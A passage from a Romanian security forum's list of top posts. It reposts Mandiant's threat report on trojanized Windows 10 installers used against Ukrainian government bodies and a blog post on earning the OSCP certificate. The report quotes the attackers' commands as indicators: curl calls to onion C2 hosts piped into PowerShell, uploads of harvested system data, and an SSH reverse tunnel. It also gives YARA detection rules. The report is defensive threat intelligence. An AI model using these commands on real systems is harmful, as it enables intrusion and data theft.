situation with China. Source
    1 point
  33. Eu la spital... după ce medicul si-a luat licența cu ChatGPT. Inca mai credeti ca filmul Idiocracy e sci-fi? Mie imi pare documentar / premonitie
    1 point
  34. E "deep" fake, dar e amuzant.
    1 point
  35. Ba fraților, nu mai vorbiți prostii aici ca e plin de polițiști slugarnici la parchetarii analfabeți din statul ticălos, militienesc, escroc si preacurvit romanesc. Te trezesti cu usa sparta si cu masina de spalat demontata pe motiv ca iezista' indicii temeinice si presupuneri rezonabile ca ar fi server
    1 point
  36. Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government MANDIANT INTELLIGENCE DEC 15, 2022 16 MIN READ Executive Summary Mandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 Operating System installers. These were distributed via torrent sites in a supply chain attack. Threat activity tracked as UNC4166 likely trojanized and distributed malicious Windows Operating system installers which drop malware that conducts reconnaissance and deploys additional capability on some victims to conduct data theft. The trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise targets selected for follow on activity included multiple Ukrainian government organizations. At this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166’s targets overlap with organizations targeted by GRU related clusters with wipers at the outset of the war. Threat Detail Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors. One trojanized ISO “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) uses the Ukrainian Language pack and could be downloaded from “https://toloka[.]to/t657016#1873175.” The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1). The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image. The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022. Figure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Attribution and Targeting Mandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest. Mandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government. The organizations where UNC4166 conducted follow on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion. This ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker” which was created on the May 11, 2022. The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification. There was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers. Outlook and Implications Supply chain operations can be leveraged for broad access, as in the case of NotPetya, or the ability to discreetly select high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone. For more research from Google Cloud on securing the supply chain, see this Perspectives on Security report. Technical Annex Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking. In some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users including the deployment of the STOWAWAY and BEACON backdoors. STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering. BEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C2 server via HTTP or DNS. The threat actor also began to deploy secondary toehold backdoors in the environment including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps. SPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process. Details Infection Vector Mandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian Language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded schedule task to determine whether the victim should have further payloads deployed. Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Malicious trojanized Windows 10 installer Downloaded from https://toloka.to/t657016#1873175 Forensic analysis on the ISO identified the changes made by UNC4166 that enables the threat actor to perform additional triage of victim accounts: Modification of the GatherNetworkInfo and Consolidator Schedule Tasks The ISO contained altered GatherNetworkInfo and Consolidator schedule tasks, which added a secondary action that executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and execute the gatherNetworkInfo.vbs script or waqmcons.exe process. Figure 2: Legitimate GatherNetworkInfo task configuration The altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell. The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws). These tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow on threat activity. Figure 3: Trojanized GatherNetworkInfo task configuration Based on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows: C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) Last edit date: 2022-05-11 12:58:55 Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID))) C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) Last edit date: 2022-05-11 12:58:12 Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe Note: At the time of analysis, the onion[.]ws C2 server is redirecting requests to legitimate websites. Software Piracy Script The ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd. SetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows installation but before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid) with the addition of a command to disable OneDriveSetup which was not identified in either script. The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the Windows license. Forensic artifacts led Mandiant to identify three additional scripts that were historically on the image, we assess that over time the threat actor has made alterations to these files. SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669) Batch script to disable legitimate services and activate Windows File currently hosted on ISO SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving Victim Identification Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY. The threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests both to download tasking and upload stolen data/responses. The threat actor’s playbook appears to follow a distinct pattern: Execute a command Optionally, filter or expand the results Export the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%\sysinfo) Optionally, compress the data into sysinfo.zip (%system32%\sysinfo.zip) Optionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed at the next beacon). Mandiant identified the threat actor exfiltrate data containing system information data, directory listings including timestamps and device geo-location. A list of commands used can be found in the indicators section. Interestingly, we did uncover a command that didn’t fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks. curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile –output temp.zip Although we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it’s unclear why they wouldn’t deploy the command directly.. chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo The download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value. It’s unclear why the threat actor performed this additional request in favor of downloading the command itself; we believe this may be used as a default command by the threat actors. Follow On Tasking If UNC4166 determined a device likely contained intelligence of value, subsequent actions were take on these devices. Based on our analysis, the subsequent tasking fall into three categories: Deployment of tools to enable exfiltration of data (like TOR and Sheret) Deployment of additional lightweight backdoors likely to provide redundant access to the target (like SPAREPART) Deployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY) TOR Browser Downloaded In some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the victim’s device. This was originally attempted through downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second TOR installer directly from the official torprojects.org website. It’s unclear why the threat actor performed these actions as Mandiant was unable to identify any use of TOR on the victim device, although this would provide the actor a second route to communicate with infrastructure through TOR or may be used by additional capability as a route for exfiltration. We also discovered the TOR installer was also hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device. bundle.zip (MD5: 66da9976c96803996fc5465decf87630) Legitimate TOR Installer bundle Downloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip Downloaded from https:// 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip Use of Sheret HTTP Server and localhost[.]run In some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices. The threat actor configured Sheret to server locally, then using SSH created a tunnel from the local device to the service localhost[.]run. In at least one instance, this web server was used for serving files on a removable drive connected to the victim device and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism. The command used for SSH tunnelling was: ssh -R 80:localhost:80 -i defaultssh localhost[.]run -o stricthostkeychecking=no >> sysinfo This command configures the local system to create a tunnel from the local device to the website localhost.run. C:\Windows\System32\HTTPDService.exe (MD5: a0d668eec4aebaddece795addda5420d) Sheret web server Publicly available as a build from https://github.com/ethanpil/sheret Compiled date: 1970/01/01 00:00:00 Deployment of SPAREPART, Likely as a Redundant Backdoor We identified the creation of a service following initial recon that we believe was the deployment of a redundant backdoor we call SPAREPART. The service named “Microsoft Delivery Network” was created to execute %SYSTEM32%\MicrosoftDeliveryNetwork\MicrosoftDeliveryCenter with the arguments “56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe powershell.exe” via the Windows SC command. Functionally SPAREPART is identical to the PowerShell backdoors that were deployed via the schedule tasks in the original ISOs. SPAREPART is executed as a Windows Service DLL, which upon execution will receive the tasking and execute via piping the commands into the PowerShell process. SPAREPART will parse the raw SMIBOS firmware table via the Windows GetSystemFirmwareTable, this code is nearly identical to code published by Microsoft on Github. The code’s purpose is to obtain the UUID of the device, which is later formatted into the same header (h: <UUID) for use in communications with the C2 server. Figure 4: SPAREPART formatting of header The payload parses the arguments provided on the command line. Interestingly there is an error in this parsing. If the threat actor provides a single argument to the payload, that argument is used as the URL and tasking can be downloaded. However, if the second command (in our instance powershell.exe) is missing, the payload will later attempt to create a process with an invalid argument which will mean that the payload is unable to execute commands provided by the threat actor. Figure 5: SPAREPART parsing threat actor input SPAREPART has a unique randomization for its sleep timer. This enables the threat actor to randomise beaconing timing. The randomisation is seeded of the base address of the image in memory, this value is then used to determine a value between 0 and 59. This value acts as the sleep timer in minutes. As the backdoor starts up, it’ll sleep for up to 59 minutes before reaching out to the C2. Any subsequent requests will be delayed for between 3 and 4 hours. If after 10 sleeps the payload has received no tasking (30-40 hours of delays), the payload will terminate until the service is next executed. Figure 6: SPAREPART randomizing the time for next beacon After the required sleep timer has been fulfilled, the payload will attempt to download a command using the provided URL. The payload attempts to download tasking using the WinHttp set of APIs and the hard coded user agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0”. The payload attempts to perform a GET request using the previously formatted headers, providing the response is a valid status (200), the data will be read and written to a previously created pipe. Figure 7: SPAREPART downloading payload If a valid response is obtained from the C2 server, the payload will create a new process using the second argument (powershell.exe) and pipe the downloaded commands as the standard input. The payload makes no attempt to return the response to the actor, similarly to the PowerShell backdoor. Figure 8: SPAREPART executing a command Although we witnessed the installation of this backdoor, the threat actor reverted to the PowerShell backdoor for tasking a couple of hours later. Due to the similarities in the payloads and the fact the threat actor reverted to the PowerShell backdoor, we believe that SPAREPART is a redundant backdoor likely to be used if the threat actor loses access to the original schedule tasks. MicrosoftDeliveryCenter (MD5: f9cd5b145e372553dded92628db038d8) SPAREPART backdoor Compiled on: 2022/11/28 02:32:33 PDB path: C:\Users\user\Desktop\ImageAgent\ImageAgent\PreAgent\src\builder\agent.pdb Deployment of Additional Backdoors In addition to the deployment of SPAREPART, the threat actor also deployed additional backdoors on some limited devices. In early September, UNC4166 deployed the payload AzureSettingSync.dll and configured its execution via a schedule task named AzureSync on at least one device. The schedule task was configured to execute AzureSync via rundll32.exe. AzureSettingSync is a BEACON payload configured to communicate with cdnworld.org, which was registered on the June 24, 2022 with an SSL certificate from Let’s Encrypt dated the 26th of August 2022. C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) BEACON backdoor Original name: tr2fe.dll Compiled on: 1970/01/01 00:00:00 Dropped by 529388109f4d69ce5314423242947c31 (BEACON) Connects to https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– Connects to https://cdnworld[.]org/34702–general/sync/42823419-cdn Due to remediation on some compromised devices, we believe that the BEACON instances were quarantined on the devices. Following this, we identified the threat actor had deployed a STOWAWAY backdoor on the victim device. C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 193.142.30.166:443 %LOCALAPPDATA%\\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) STOWAWAY backdoor Compiled on: 1970/01/01 00:00:00 Connects to 91.205.230.66:8443 Indicators Scheduled Tasks C:\Windows\System32\Tasks\MicrosoftWindowsNotificationCenter (MD5: 16b21091e5c541d3a92fb697e4512c6d) Schedule task configured to execute Powershell.exe with the command line curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell Trojanized Scheduled Tasks C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) BEACON Backdoor C:\Windows\System32\AzureSettingSync.dll (MD5: 59a3129b73ba4756582ab67939a2fe3c) Scheduled Tasks for Persistence C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSync C:\Windows\System32\Tasks\Microsoft\Windows\Maintenance\AzureSyncDaily STOWAWAY Backdoor C:\Windows\System32\splwow86.exe (MD5: 0f06afbb4a2a389e82de6214590b312b) %LOCALAPPDATA%\SODUsvc.exe (MD5: a8e7d8ec0f450037441ee43f593ffc7c) Services for Persistence Printer driver host for applications SODUsvc On Host Recon Commands Get-ChildItem -Recurse -Force -Path ((C:)+’') | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo.zip -Force; Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8 invoke-restmethod http://ip-api[.]com/json | Export-Csv -path sysinfo -encoding UTF8 Get-Volume | Where-Object {.DriveLetter -and .DriveLetter -ne ‘C’ -and .DriveType -eq ‘Fixed’} | ForEach-Object {Get-ChildItem -Recurse -Directory (.DriveLetter+‘:’) | Select-Object -Property Psdrive, FullName, Length, Creationtime, lastaccesstime, lastwritetime | Export-Csv -Path sysinfo -encoding UTF8; Compress-Archive -Path sysinfo -DestinationPath sysinfo -Force; curl.exe -H (’h:’+(wmic csproduct get UUID)) –data-binary ‘@sysinfo.zip’ -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo Trojanized Windows Image Network Indicators Indicators of Compromise Signature 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe Malicious Windows Image Tor C2 ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]ws Malicious Windows Image Tor C2 BEACON C2s https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– https://cdnworld[.]org/34702–general/sync/42823419-cdn STOWAWAY C2s 193.142.30[.]166:443 91.205.230[.]66:8443 Appendix MITRE ATT&CK Framework ATT&CK Tactic Category Techniques Initial Access T1195.002: Compromise Software Supply Chain Persistence T1136: Create Account T1543.003: Windows Service Discovery T1049: System Network Connections Discovery Execution T1047: Windows Management Instrumentation T1059: Command and Scripting Interpreter T1059.001: PowerShell T1059.005: Visual Basic T1569.002: Service Execution Defense Evasion T1027: Obfuscated Files or Information T1055: Process Injection T1140: Deobfuscate/Decode Files or Information T1218.011: Rundll32 T1562.004: Disable or Modify System Firewall T1574.011: Services Registry Permissions Weakness Command and Control T1071.004: DNS T1090.003: Multi-hop Proxy T1095: Non-Application Layer Protocol T1573.002: Asymmetric Cryptography Resource Development T1587.002: Code Signing Certificates T1588.004: Digital Certificates T1608.003: Install Digital Certificate Detection Rules rule M_Backdoor_SPAREPART_SleepGenerator { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the algorithm used to determine the next sleep timer" version = "1" weight = "100" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $ = {C1 E8 06 89 [5] C1 E8 02 8B} $ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01} $ = {8B 80 FC 00 00 00} $ = {D1 E8 [4] c1 E1 0f 0b c1} condition: all of them } rule M_Backdoor_SPAREPART_Struct { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the PDB and a struct used in SPAREPART" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ?? } condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pdb and $struct and filesize < 20KB } Sursa: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
    1 point
  37. Daca nu ai nevoie de contabil, sigur ai de stomatolog sau broker bursier. Recomand @Checu incredere.
    1 point
  38. OSCP Certification by ciaranmcnally Given I have been working in information security for the past few years, I became well aware of the different certifications available as a means of professional development. The certification that stood out as gaining the most respect from the security community seemed to be the “(OSCP) Offensive Security Certified Professional” certificate, I witnessed this time and time again in conversations online. The reason often given is that it is a tough 24 hour practical exam vs a multiple choice questionnaire like many other security certificates. The OSCP is also listed regularly as a desirable requirement for many different kinds of infosec engineering jobs. I recently received confirmation that I have successfully achieved this certification. To anyone interested in pursuing the OSCP, I would completely encourage it. There is no way you can come away from this experience without adding a few new tricks or tools to your security skills arsenal and aside from all of that, it’s also very fun. This certificate will demonstrate to clients or to any potential employer that you have a good wide understanding of penetration testing with a practical skill-set to back up the knowledge. I wanted to get this as I’ve had clients in the past not follow up on using my services due to me not having any official security certificates (especially CREST craving UK based customers). Hopefully this opens up some doors to new customers. Before undertaking this course I already had a lot of experience performing vulnerability assessments and penetrations tests, I also had a few CVEs under my belt and have been quite active in the wider information security community by creating tools, taking part in bug bounties and being a fan of responsible disclosure in general. I found the challenge presented by this exam to be quite humbling and very much a worthwhile engagement. I would describe the hacking with kali course materials and videos as very entry-level friendly which is perfect for someone with a keen interest looking to learn the basics of penetration testing. The most valuable part of the course for those already familiar with the basics is the interactive lab environment, this is an amazing experience and it’s hard not to get excited thinking about it. There were moments of frustration and teeth-grinding but it was a very enjoyable way to sharpen skills and try out new techniques or tools. I signed up for the course initially a full year ago while working full time on contracts and found it extremely difficult to find the time to work on the labs as I had multiple ongoing projects and was doing bug bounties quite actively too. I burnt out fairly quick and didn’t concentrate on it at all. I did one or two of the “known to be hard” machines in the labs fairly easily which convinced me I was ready and sat the exam having compromised less than 10 of the lab hosts. This was of course silly and I only managed 2 roots and one local access shell which wasn’t near enough points to pass and very much dulled my arrogance at the time. I didn’t submit an exam report and decided to focus on my contracts and dedicate my time to the labs properly at a later date. Fast forward over a year later to the start of this month (September) and I had 2 weeks free that I couldn’t get contract work for. So I purchased a lab extension with the full intention of dedicating my time completely to obtaining this certificate. In the two weeks I got around 20 or so lab machines and set the date for my first real exam attempt. This went well but I didn’t quite make it over the line. I rooted 3 machines and fell short of privilege escalating on a 4th windows host. I was so close and possibly could have passed if I did the lab report and exercises, however this time around I wasn’t upset by the failure and became more determined than ever to keep trying. I booked another 2 weeks in the labs, focused on machines with manual windows privilege escalation and booked my next exam sitting, successfully nailing it. As I had learned a lot of penetration testing skills doing bug bounties, I found that it was very easy to identify and gain remote access to the lab machines, I usually gained remote shell access within the first 20 or 30 minutes for the large majority of the attempted targets. I very quickly found out that my weakest area was local privilege escalation. During my contract engagements, it is a regular occurrence that my clients request I don’t elevate any further with a remote code execution issue on a live production environment. This activity is also greatly discouraged in bug bounties so I can very much see why I didn’t have much skill in this area. The OSCP lab environment taught me a large amount of techniques and different ways of accomplishing this. I feel I have massively skilled up with regard to privilege escalation on Linux or Windows hosts. I’m very happy to join the ranks of the (OSCP) Offensive Security Certified Professionals and would like to thank anyone who helped me on this journey by providing me with links to quality material produced by the finest of hackers. Keeping the hacker knowledge sharing mantra in mind, below is a categorized list of very useful resources I have used during my journey to achieving certification. I hope these help you to overcome many obstacles by trying harder! Mixed https://www.nop.cat/nmapscans/ https://github.com/1N3/PrivEsc https://github.com/xapax/oscp/blob/master/linux-template.md https://github.com/xapax/oscp/blob/master/windows-template.md https://github.com/slyth11907/Cheatsheets https://github.com/erik1o6/oscp/ https://backdoorshell.gitbooks.io/oscp-useful-links/content/ https://highon.coffee/blog/lord-of-the-root-walkthrough/ MsfVenom https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://netsec.ws/?p=331 Shell Escape Techniques https://netsec.ws/?p=337 https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells https://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells Pivoting http://www.fuzzysecurity.com/tutorials/13.html http://exploit.co.il/networking/ssh-tunneling/ https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117 https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ https://www.offensive-security.com/metasploit-unleashed/portfwd/ Linux Privilege Escalation https://0x90909090.blogspot.ie/2015/07/no-one-expect-command-execution.html https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/\#gref https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/mzet-/linux-exploit-suggester https://github.com/SecWiki/linux-kernel-exploits https://highon.coffee/blog/linux-commands-cheat-sheet/ https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt https://github.com/lucyoa/kernel-exploits https://www.rebootuser.com/?p=1758 https://www.securitysift.com/download/linuxprivchecker.py https://www.youtube.com/watch?v=dk2wsyFiosg https://www.youtube.com/watch?v=2NMB-pfCHT8https://www.youtube.com/watch?v=1A7yJxh-fyc https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/ https://github.com/foxglovesec/RottenPotato https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py https://github.com/pentestmonkey/windows-privesc-check https://github.com/PowerShellMafia/PowerSploit https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Windows/Windows_Privilege_Escalation.md https://github.com/SecWiki/windows-kernel-exploits https://hackmag.com/security/elevating-privileges-to-administrative-and-further/ https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ https://toshellandback.com/2015/11/24/ms-priv-esc/ https://www.gracefulsecurity.com/privesc-unquoted-service-path/ https://www.commonexploits.com/unquoted-service-paths/ https://www.exploit-db.com/dll-hijacking-vulnerable-applications/ https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be Sursa: https://securit.ie/blog/?p=70
    1 point
×
×
  • Create New...